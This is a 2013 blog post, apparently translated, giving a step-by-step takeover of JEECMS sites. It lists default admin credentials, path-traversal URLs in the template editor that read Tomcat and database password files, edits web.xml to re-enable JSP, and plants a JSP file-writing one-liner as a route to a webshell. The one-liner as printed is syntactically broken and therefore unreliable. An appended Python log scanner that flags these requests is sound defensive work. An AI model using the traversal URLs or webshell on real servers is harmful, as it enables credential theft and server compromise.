JEECMS editing vulnerability and getting a webshell at will, ahaha
2013-12-10 22:47
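JEECMS is built on Java technology and inherits its strengths: powerful, stable, secure, efficient and cross-platform. It uses the mainstream SpringMVC3 + Spring3 + Hibernate3 + Freemarker architecture. Its security is extremely strict: once the site has been installed, JSP files can no longer be executed in any directory (web.xml configures a filter that blocks many kinds of dynamic scripts).
2.x admin backend:
login/Jeecms.do
3.x admin backend:
jeeadmin/jeecms/index.do
Default account: admin
Default password: password
Reading the Tomcat password: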
/jeeadmin/jeecms/template/v_edit.do?root=../../conf/&name=../../conf/tomcat-users.xml
Reading the JDBC database account and password:
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2Fconfig%2F&name=%2FWEB-INF%2Fconfig%2Fjdbc.properties
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/05/c9b7ed0bb6e52c54a50063fe29d079e8.jpg)
Read path for JEECMS 2.x:
admin/core/template/Com_edit.do?relPath=\../../../classes/jdbc.properties
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/05/1aebd7e480ed2879b715b053fcf0b855.jpg)
Editing web.xml to remove the filtering of JSP:
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2F&name=%2FWEB-INF%2Fweb.xml
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/05/a8e8ae75b111fe170cb0964ed7c96f6a.jpg)
Read path for JEECMS 2.x:
admin/core/template/Com_edit.do?relPath=\../../../web.xml
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/05/add5d465e146b65d4543d111f1bb0028.jpg)
Editing install/install_setup.jsp:
/jeeadmin/jeecms/template/v_edit.do?root=%2Finstall%2F&name=%2Finstall%2Finstall_setup.jsp
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/05/d6f6384b79a6e683254430cf1dccfafd.jpg)
Read path for JEECMS 2.x:
admin/core/template/Com_edit.do?relPath=\../../../../install\install_setup.jsp
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/05/36dd6c5f4721658a0b22091688e8ee7d.jpg)
Insert the JSP one-liner:
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("("f"))).write(request.getParameter("t").getBytes());
%>
Path of the one-liner after the edit:
/install/install_setup.jsp
Path of the full JSP webshell once the one-liner is connected:
/ma.jsp
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/05/7742c682675a597c8fedf8a8718a1858.jpg)
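Notes:
1: In 2.X, a file in jsp format can be uploaded as media in the admin backend.
2: After web.xml is modified the server has to be restarted (unless it reloads changes automatically).
3: This article is original work by 李听Hack; please credit the author when reposting.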
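The requests above leave a clear trace in web-server access logs. The following is an added example, not part of the original article or of JEECMS: it flags requests to the template-editor endpoints shown above whose root, name or relPath parameter leaves the template directory or names a non-template file. ALLOWED_ROOT is a placeholder for the site's real template directory, and the log lines are constructed.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Editor endpoints and path parameters taken from the URLs in the article.
EDITOR_ENDPOINTS = ("/template/v_edit.do", "/template/com_edit.do")
PATH_PARAMS = ("root", "name", "relpath")
# Placeholder (assumption): replace with the site's real template directory, lowercase.
ALLOWED_ROOT = "/tpl-root-placeholder/"
BLOCKED_EXT = (".jsp", ".jspx", ".xml", ".properties")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def check_path(value):
    """Return the reasons a path parameter falls outside normal template editing."""
    for _ in range(3):  # undo repeated URL encoding
        value = unquote(value)
    path = value.replace("\\", "/").lower()
    reasons = []
    if ".." in path.split("/"):
        reasons.append("directory traversal")
    resolved = posixpath.normpath("/" + path.lstrip("/"))
    if not (resolved + "/").startswith(ALLOWED_ROOT):
        reasons.append("outside template root")
    if resolved.endswith(BLOCKED_EXT):
        reasons.append("non-template file type")
    return reasons

def inspect_request(target):
    """Check one request target; returns [] for benign or unrelated requests."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(EDITOR_ENDPOINTS):
        return []
    params = parse_qs(parts.query).items()
    return [f"{k}: {r}" for k, vals in params if k.lower() in PATH_PARAMS
            for v in vals for r in check_path(v)]

def scan(lines):
    """Return {line_number: reasons} for suspicious access-log lines."""
    found = ((n, REQUEST_RE.search(line)) for n, line in enumerate(lines, 1))
    hits = {n: inspect_request(m.group(1)) for n, m in found if m}
    return {n: r for n, r in hits.items() if r}

SAMPLE_LOG = [  # constructed lines, not real traffic
    '192.0.2.10 - - [10/Dec/2013:22:40:01 +0800] "GET /jeeadmin/jeecms/template/v_edit.do?root=%2Ftpl-root-placeholder%2F&name=%2Ftpl-root-placeholder%2Findex.html HTTP/1.1" 200 512',
    '192.0.2.10 - - [10/Dec/2013:22:41:07 +0800] "GET /jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2F&name=%2FWEB-INF%2Fweb.xml HTTP/1.1" 200 9000',
    '192.0.2.10 - - [10/Dec/2013:22:42:13 +0800] "GET /admin/core/template/Com_edit.do?relPath=%5C../../../classes/jdbc.properties HTTP/1.1" 200 700',
]
```

Parameters sent in a POST body do not appear in a standard access log, so the same check_path function should also be applied wherever those parameters are visible, such as a reverse proxy or a servlet filter.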